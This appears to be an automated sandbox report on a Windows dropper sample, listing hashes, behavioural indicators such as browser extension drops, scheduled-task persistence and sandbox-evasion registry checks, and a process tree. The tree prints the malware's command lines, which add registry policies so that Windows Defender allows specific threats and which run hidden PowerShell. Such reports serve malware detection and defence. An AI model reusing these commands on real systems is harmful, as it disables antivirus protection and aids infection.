Analysis
-
max time kernel
147s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
02/06/2024, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
f602d62b0d092ed0f4bc8904879574e7692a1299d2d06643c1caf8c975409a70.exe
Resource
win7-20240220-en
General
-
Target
f602d62b0d092ed0f4bc8904879574e7692a1299d2d06643c1caf8c975409a70.exe
-
Size
7.3MB
-
MD5
83ab65e8394b71b0c2e3572cafcf65ff
-
SHA1
2d19be95abcb1671ef04a94be6d8e323233a4c46
-
SHA256
f602d62b0d092ed0f4bc8904879574e7692a1299d2d06643c1caf8c975409a70
-
SHA512
1d9def8e34416b8c97ceb081a2b077975527b135a80f0fc35a5841ff3e77b985a4362ece1dde3982be04fdf9bc7c2b978a29591ff536f640d6340e918083d320
-
SSDEEP
196608:91O0oHobW7/7VIUshVjifeR4yNwrGTvLqi5uFHUOS:3O5HoUTVShAOnyrGTDJ5uFDS
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 85 4588 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 1492 powershell.exe 996 powershell.EXE 3312 powershell.exe 5004 powershell.exe 5044 powershell.exe 2140 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation NCcSSMw.exe -
Executes dropped EXE 4 IoCs
pid Process 4620 Install.exe 1284 Install.exe 3720 Install.exe 4948 NCcSSMw.exe -
Loads dropped DLL 1 IoCs
pid Process 4588 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json NCcSSMw.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json NCcSSMw.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini NCcSSMw.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 NCcSSMw.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA NCcSSMw.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F NCcSSMw.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 NCcSSMw.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 NCcSSMw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 NCcSSMw.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi NCcSSMw.exe File created C:\Program Files (x86)\hsUwQAlMU\zUGyyvJ.xml NCcSSMw.exe File created C:\Program Files (x86)\dlfHiRefefjU2\jkWVOrFcGEhee.dll NCcSSMw.exe File created C:\Program Files (x86)\ZEkGlaTFWGUn\FAuVvGS.dll NCcSSMw.exe File created C:\Program Files (x86)\dlfHiRefefjU2\AJwFTOZ.xml NCcSSMw.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\FmFPxkD.xml NCcSSMw.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\kXGoLEo.dll NCcSSMw.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\BaeXNCG.xml NCcSSMw.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak NCcSSMw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak NCcSSMw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja NCcSSMw.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\ydUKJgk.dll NCcSSMw.exe File created C:\Program Files (x86)\hsUwQAlMU\kVrcEe.dll NCcSSMw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi NCcSSMw.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job schtasks.exe File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job schtasks.exe File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job schtasks.exe File created C:\Windows\Tasks\BjyVbWVaXyfCTlHuI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 940 3720 WerFault.exe 129 4632 1284 WerFault.exe 92 2548 4948 WerFault.exe 225 -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4968 schtasks.exe 4752 schtasks.exe 4472 schtasks.exe 2332 schtasks.exe 636 schtasks.exe 2436 schtasks.exe 3684 schtasks.exe 5036 schtasks.exe 1480 schtasks.exe 3328 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix NCcSSMw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2bbef64-0000-0000-0000-d01200000000}\NukeOnDelete = "0" NCcSSMw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" NCcSSMw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5044 powershell.exe 2140 powershell.exe 2140 powershell.exe 5044 powershell.exe 1492 powershell.exe 1492 powershell.exe 2140 powershell.exe 5044 powershell.exe 1492 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 1404 powershell.exe 1404 powershell.exe 1404 powershell.exe 996 powershell.EXE 996 powershell.EXE 996 powershell.EXE 3312 powershell.exe 3312 powershell.exe 3312 powershell.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 5004 powershell.exe 5004 powershell.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 5004 powershell.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe 4948 NCcSSMw.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeIncreaseQuotaPrivilege 2428 WMIC.exe Token: SeSecurityPrivilege 2428 WMIC.exe Token: SeTakeOwnershipPrivilege 2428 WMIC.exe Token: SeLoadDriverPrivilege 2428 WMIC.exe Token: SeSystemProfilePrivilege 2428 WMIC.exe Token: SeSystemtimePrivilege 2428 WMIC.exe Token: SeProfSingleProcessPrivilege 2428 WMIC.exe Token: SeIncBasePriorityPrivilege 2428 WMIC.exe Token: SeCreatePagefilePrivilege 2428 WMIC.exe Token: SeBackupPrivilege 2428 WMIC.exe Token: SeRestorePrivilege 2428 WMIC.exe Token: SeShutdownPrivilege 2428 WMIC.exe Token: SeDebugPrivilege 2428 WMIC.exe Token: SeSystemEnvironmentPrivilege 2428 WMIC.exe Token: SeRemoteShutdownPrivilege 2428 WMIC.exe Token: SeUndockPrivilege 2428 WMIC.exe Token: SeManageVolumePrivilege 2428 WMIC.exe Token: 33 2428 WMIC.exe Token: 34 2428 WMIC.exe Token: 35 2428 WMIC.exe Token: 36 2428 WMIC.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeIncreaseQuotaPrivilege 2428 WMIC.exe Token: SeSecurityPrivilege 2428 WMIC.exe Token: SeTakeOwnershipPrivilege 2428 WMIC.exe Token: SeLoadDriverPrivilege 2428 WMIC.exe Token: SeSystemProfilePrivilege 2428 WMIC.exe Token: SeSystemtimePrivilege 2428 WMIC.exe Token: SeProfSingleProcessPrivilege 2428 WMIC.exe Token: SeIncBasePriorityPrivilege 2428 WMIC.exe Token: SeCreatePagefilePrivilege 2428 WMIC.exe Token: SeBackupPrivilege 2428 WMIC.exe Token: SeRestorePrivilege 2428 WMIC.exe Token: SeShutdownPrivilege 2428 WMIC.exe Token: SeDebugPrivilege 2428 WMIC.exe Token: SeSystemEnvironmentPrivilege 2428 WMIC.exe Token: SeRemoteShutdownPrivilege 2428 WMIC.exe Token: SeUndockPrivilege 2428 WMIC.exe Token: SeManageVolumePrivilege 2428 WMIC.exe Token: 33 2428 WMIC.exe Token: 34 2428 WMIC.exe Token: 35 2428 WMIC.exe Token: 36 2428 WMIC.exe Token: SeDebugPrivilege 996 powershell.EXE Token: SeDebugPrivilege 3312 powershell.exe Token: SeDebugPrivilege 5004 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4168 WMIC.exe Token: SeIncreaseQuotaPrivilege 4168 WMIC.exe Token: SeSecurityPrivilege 4168 WMIC.exe Token: SeTakeOwnershipPrivilege 4168 WMIC.exe Token: SeLoadDriverPrivilege 4168 WMIC.exe Token: SeSystemtimePrivilege 4168 WMIC.exe Token: SeBackupPrivilege 4168 WMIC.exe Token: SeRestorePrivilege 4168 WMIC.exe Token: SeShutdownPrivilege 4168 WMIC.exe Token: SeSystemEnvironmentPrivilege 4168 WMIC.exe Token: SeUndockPrivilege 4168 WMIC.exe Token: SeManageVolumePrivilege 4168 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4168 WMIC.exe Token: SeIncreaseQuotaPrivilege 4168 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4888 wrote to memory of 4620 4888 f602d62b0d092ed0f4bc8904879574e7692a1299d2d06643c1caf8c975409a70.exe 91 PID 4888 wrote to memory of 4620 4888 f602d62b0d092ed0f4bc8904879574e7692a1299d2d06643c1caf8c975409a70.exe 91 PID 4888 wrote to memory of 4620 4888 f602d62b0d092ed0f4bc8904879574e7692a1299d2d06643c1caf8c975409a70.exe 91 PID 4620 wrote to memory of 1284 4620 Install.exe 92 PID 4620 wrote to memory of 1284 4620 Install.exe 92 PID 4620 wrote to memory of 1284 4620 Install.exe 92 PID 1284 wrote to memory of 3156 1284 Install.exe 98 PID 1284 wrote to memory of 3156 1284 Install.exe 98 PID 1284 wrote to memory of 3156 1284 Install.exe 98 PID 3156 wrote to memory of 4256 3156 cmd.exe 100 PID 3156 wrote to memory of 4256 3156 cmd.exe 100 PID 3156 wrote to memory of 4256 3156 cmd.exe 100 PID 4256 wrote to memory of 1368 4256 forfiles.exe 101 PID 4256 wrote to memory of 1368 4256 forfiles.exe 101 PID 4256 wrote to memory of 1368 4256 forfiles.exe 101 PID 1368 wrote to memory of 1436 1368 cmd.exe 103 PID 1368 wrote to memory of 1436 1368 cmd.exe 103 PID 1368 wrote to memory of 1436 1368 cmd.exe 103 PID 3156 wrote to memory of 4720 3156 cmd.exe 105 PID 3156 wrote to memory of 4720 3156 cmd.exe 105 PID 3156 wrote to memory of 4720 3156 cmd.exe 105 PID 4720 wrote to memory of 4960 4720 forfiles.exe 106 PID 4720 wrote to memory of 4960 4720 forfiles.exe 106 PID 4720 wrote to memory of 4960 4720 forfiles.exe 106 PID 4960 wrote to memory of 3160 4960 cmd.exe 107 PID 4960 wrote to memory of 3160 4960 cmd.exe 107 PID 4960 wrote to memory of 3160 4960 cmd.exe 107 PID 3156 wrote to memory of 3948 3156 cmd.exe 108 PID 3156 wrote to memory of 3948 3156 cmd.exe 108 PID 3156 wrote to memory of 3948 3156 cmd.exe 108 PID 3948 wrote to memory of 3140 3948 forfiles.exe 109 PID 3948 wrote to memory of 3140 3948 forfiles.exe 109 PID 3948 wrote to memory of 3140 3948 forfiles.exe 109 PID 3140 wrote to memory of 2684 3140 cmd.exe 110 PID 3140 wrote to memory of 2684 3140 cmd.exe 110 PID 3140 wrote to memory of 2684 3140 cmd.exe 110 PID 3156 wrote to memory of 3796 3156 cmd.exe 111 PID 3156 wrote to memory of 3796 3156 cmd.exe 111 PID 3156 wrote to memory of 3796 3156 cmd.exe 111 PID 3796 wrote to memory of 4412 3796 forfiles.exe 112 PID 3796 wrote to memory of 4412 3796 forfiles.exe 112 PID 3796 wrote to memory of 4412 3796 forfiles.exe 112 PID 4412 wrote to memory of 5012 4412 cmd.exe 114 PID 4412 wrote to memory of 5012 4412 cmd.exe 114 PID 4412 wrote to memory of 5012 4412 cmd.exe 114 PID 3156 wrote to memory of 3444 3156 cmd.exe 115 PID 3156 wrote to memory of 3444 3156 cmd.exe 115 PID 3156 wrote to memory of 3444 3156 cmd.exe 115 PID 3444 wrote to memory of 940 3444 forfiles.exe 116 PID 3444 wrote to memory of 940 3444 forfiles.exe 116 PID 3444 wrote to memory of 940 3444 forfiles.exe 116 PID 940 wrote to memory of 5044 940 cmd.exe 117 PID 940 wrote to memory of 5044 940 cmd.exe 117 PID 940 wrote to memory of 5044 940 cmd.exe 117 PID 1284 wrote to memory of 632 1284 Install.exe 118 PID 1284 wrote to memory of 632 1284 Install.exe 118 PID 1284 wrote to memory of 632 1284 Install.exe 118 PID 632 wrote to memory of 4836 632 forfiles.exe 120 PID 632 wrote to memory of 4836 632 forfiles.exe 120 PID 632 wrote to memory of 4836 632 forfiles.exe 120 PID 1284 wrote to memory of 4968 1284 Install.exe 122 PID 1284 wrote to memory of 4968 1284 Install.exe 122 PID 1284 wrote to memory of 4968 1284 Install.exe 122 PID 1284 wrote to memory of 4436 1284 Install.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\f602d62b0d092ed0f4bc8904879574e7692a1299d2d06643c1caf8c975409a70.exe"C:\Users\Admin\AppData\Local\Temp\f602d62b0d092ed0f4bc8904879574e7692a1299d2d06643c1caf8c975409a70.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Users\Admin\AppData\Local\Temp\7zS2C3B.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\7zS3302.tmp\Install.exe.\Install.exe /IwVludidZTK "385120" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
